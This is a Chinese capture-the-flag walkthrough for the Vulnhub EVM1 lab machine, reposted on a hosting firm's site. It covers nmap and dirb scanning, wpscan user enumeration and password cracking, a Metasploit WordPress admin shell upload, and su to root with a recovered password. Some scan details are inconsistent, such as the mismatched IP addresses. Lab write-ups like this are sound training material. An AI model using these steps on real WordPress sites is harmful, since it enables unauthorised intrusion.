高防服务器
  • 电 话:400-808-5836
  • MSN :huad@live.com
  • 客服QQ:4698328 9291215
  • 咨询邮箱:sales@fobhost.com
  • 售后:services@fobhost.com
  • https://www.gaofangfuwuqi.com/
    • 首页 新闻资讯 Vulhub-EVM1靶机

    Vulhub-EVM1靶机


    Vulhub-EVM1靶机

    发布时间:2020-07-31 13:45:06 来源:网络 阅读:186 作者:wx5c99daab1f230 栏目:安全技术

    一.环境搭建
    https://www.vulnhub.com/entry/evm-1,391/

    下载ova镜像文件,vbox导入,设置两张虚拟网卡,分别为NAT模式和仅主机模式(改为默认网卡配置)

    ip为192.168.124.156
    二.信息搜集:
    (端口扫描)

    nmap -A 192.168.124.56 Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-16 01:45 EST Nmap scan report for localhost (192.168.124.56) Host is up (0.00035s latency). Not shown: 993 closed ports PORT    STATE SERVICE     VERSION 22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey:  |   2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA) |   256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA) |_  256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519) 53/tcp  open  domain      ISC BIND 9.10.3-P4 (Ubuntu Linux) | dns-nsid:  |_  bind.version: 9.10.3-P4-Ubuntu 80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 110/tcp open  pop3? 139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 143/tcp open  imap        Dovecot imapd |_imap-capabilities: CAPABILITY 445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) MAC Address: 00:0C:29:C4:5F:AA (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernel  Host script results: |_clock-skew: mean: 1h49m59s, deviation: 2h63m12s, median: 0s |_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery:  |   OS: Windows 6.1 (Samba 4.3.11-Ubuntu) |   Computer name: ubuntu-extermely-vulnerable-m4ch2ine |   NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INEx00 |   Domain name: x00 |   FQDN: ubuntu-extermely-vulnerable-m4ch2ine |_  System time: 2019-12-16T01:48:21-05:00 | smb-security-mode:  |   account_used: guest |   authentication_level: user |   challenge_response: supported |_  message_signing: disabled (dangerous, but default) | smb2-security-mode:  |   2.02:  |_    Message signing enabled but not required | smb2-time:  |   date: 2019-12-16 01:48:21 |_  start_date: N/A

    (目录扫描)
    开始使用dirb进行目录扫描dirb http://192.168.124.56/

    从目录扫描看出他有wordpress所以先试试之前使用过的工具wpscan

    wpscan –url http://192.168.124.56/wordpress/ -e u

    成功得到账号c0rrupt3d_brain,现在继续破解他的密码
    wpscan –url http://192.168.124.56/wordpress/ -e u -P /chen.txt

    成功破解出密码24992499

    现在开始使用msfconsole 使用模块

    unix/webapp/wp_admin_shell_upload set RhOSTS 192.168.124.56 set USERNAME c0rrupt3d_brain set PassWORD 24992499 set targeturi /wordpress run

    直接进入他的家目录之后cd root3r 进来之后发现有一个文件似乎是root密码文件

    现在进行查看发现似乎是密码,既然已经知道了密码所以接下来进入交互页面如下图:

    shell python -c "import pty;pty.spawn('/bin/bash')" su root

    密码输入为:willy26

    成功拿到root

    [微信提示:高防服务器能助您降低 IT 成本,提升运维效率,使您更专注于核心业务创新。

    [图文来源于网络,不代表本站立场,如有侵权,请联系高防服务器网删除]
    [